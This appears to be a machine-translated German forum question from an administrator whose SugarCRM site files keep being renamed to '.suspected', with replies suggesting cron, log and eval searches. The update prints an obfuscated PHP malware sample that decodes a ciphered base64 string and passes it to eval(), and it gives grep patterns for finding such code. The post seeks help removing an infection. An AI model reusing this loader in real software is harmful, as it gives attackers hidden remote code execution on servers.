Seit den letzten 4 Tagen haben wir seltsame Problem auf unserem Produktionsserver (AWS EC2-Instanz) speziell für nur eine Website, die SugarCRM ist.php-Datei automatisch in php.suspeced umbenannt
Ausgabe wird /home/site_folder/public_html/include/MassUpdate.php Datei automatisch zu umbenannt /home/site_folder/public_html/include/MassUpdate.php.suspected
Dies geschieht 2-3 mal an einem Tag mit 3-4 Stunden Abstand. Dieses Problem tritt nur bei einer bestimmten Site auf, selbst wenn es nicht für das Staging der Replik der gleichen Site auftritt. Ich habe sogar den Code dieser Datei von beiden Seiten überprüft, es ist dasselbe.
Wir haben gegoogelt und gefunden, ein solches Problem tritt vor allem für Wordpress-Websites und es könnte wegen Angriff sein. Aber wir haben unseren Server gegen den Angriff überprüft, es gibt keinen. Außerdem wird kein Viren-/Malware-Scan auf dem Server ausgeführt.
Was sollen wir tun?
Update: Wir haben einige Dinge, nachdem Wir egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
ausgeführt durch diese link gehen und fand, dass es nur wenige Dateien mit Beispielcode folgt.
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
Scheint einige Malware, wie wir es dauerhaft entfernen?
Dank
Kann sein, dass es einige Cron-Funktion gibt. –
Nein, es gibt keinen solchen Cron. –
Wenn es sich um eine Produktions-App handelt, empfehle ich Ihnen, sofort einen Sicherheitsexperten zu kontaktieren. Können Sie in Ihren Web-Server-Protokollen überprüfen, ob irgendwelche seltsamen Anforderungen an diese Datei unmittelbar vor der Änderung des Namens vorliegen? Können Sie versuchen, dies von der CLI 'find ausführen. -name "* .php" -exec grep -H "eval (" {} \; "aus der public_html/level. Dies wird nach allen PHP-Dateien suchen, die möglicherweise von dem Hacker erstellt wurden, der' eval' aufruft Vielleicht finde ich einige falsche Positive mit diesem. –